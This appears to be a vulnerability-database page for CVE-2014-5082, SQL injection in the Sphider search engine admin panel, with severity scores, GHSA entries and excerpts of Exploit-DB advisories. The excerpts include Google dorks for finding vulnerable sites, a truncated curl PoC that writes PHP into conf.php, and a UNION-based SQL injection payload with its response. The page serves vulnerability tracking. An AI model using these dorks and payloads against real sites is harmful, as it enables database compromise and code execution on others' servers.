CVE-2014-5082
published 2014-08-06CVE-2014-5082: Multiple SQL injection vulnerabilities in admin/admin.php in Sphider 1.3.6 and earlier, Sphider Pro, and Sphider-plus allow remote attackers to execute…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.10%
79.4th percentile
Multiple SQL injection vulnerabilities in admin/admin.php in Sphider 1.3.6 and earlier, Sphider Pro, and Sphider-plus allow remote attackers to execute arbitrary SQL commands via the (1) site_id or (2) url parameter.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sphider | sphider | <= 1.3.6 | — |
| sphider | sphider | — | — |
| sphider | sphider | — | — |
| sphider | sphider | — | — |
| sphider | sphider | — | — |
| sphider | sphider | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qq9p-gf26-4xfg: Multiple SQL injection vulnerabilities in admin/admin
ghsa_unreviewed·2022-05-17
CVE-2014-5082 [HIGH] CWE-89 GHSA-qq9p-gf26-4xfg: Multiple SQL injection vulnerabilities in admin/admin
Multiple SQL injection vulnerabilities in admin/admin.php in Sphider 1.3.6 and earlier, Sphider Pro, and Sphider-plus allow remote attackers to execute arbitrary SQL commands via the (1) site_id or (2) url parameter.
GHSA
GHSA-gjwq-8q6q-xcjf: Cross-site scripting (XSS) vulnerability in admin/admin
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2014-5193 [HIGH] CWE-79 GHSA-gjwq-8q6q-xcjf: Cross-site scripting (XSS) vulnerability in admin/admin
Cross-site scripting (XSS) vulnerability in admin/admin.php in Sphider 1.3.6 allows remote attackers to inject arbitrary web script or HTML via the category parameter. NOTE: the url parameter vector is already covered by CVE-2014-5082.
No detection rules found.
Exploit-DB
Sphider Search Engine - Multiple Vulnerabilities
exploitdb·2014-08-02·CVSS 9.8
CVE-2014-5087 [CRITICAL] Sphider Search Engine - Multiple Vulnerabilities
Sphider Search Engine - Multiple Vulnerabilities
---
# Exploit Title: Sphider Search Engine - Multiple Vulnerabilities
# Google Dork: ext:php intext:sphider inurl:search.php
# Date: 6/20/2014
# Exploit Author: Shayan Sadigh (twitter.com/r1pplex) |
# Vendor Homepage: http://www.sphider.eu/
# Version: Sphider ");
fclose($fhandle);
}
as you can see the complete lack of santization here allows one to simply feed one of these fields arbitrary php and it will be written to conf.php; this code is reused in all sphider forks/clones
PoC: localhost:~$ curl -d "user=foo&pass=bar&f=settings&Submit=ion_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100&_pdftotext_path=&_c
Exploit-DB
Sphider Search Engine 1.3.6 - Multiple Vulnerabilities
exploitdb·2014-07-28
CVE-2014-5194 Sphider Search Engine 1.3.6 - Multiple Vulnerabilities
Sphider Search Engine 1.3.6 - Multiple Vulnerabilities
---
# Exploit Title: Sphider 1.3.6 or later SQL Injection
# Google Dork: intitle:"Sphider Admin Login"
# Date: 1 July 2014
# Exploit Author: Mike Manzotti
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v 1.3.6
Description:
The web application is vulnerable to SQLi. Once a website has been indexed with Sphider, an attacker can inject SQL under Sites -> Browser pages-> filter option.
Proof of Concept:
Response: POST: /admin/admin.php
per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21
Response:
5.5.35-0+wheezy1
[cid:[email protected]]
# Exploit Title: Sphider 1.3.6 or later PHP Injection
Description:
An authenticated user can inject P
No writeups or analysis indexed.
2014-08-06
Published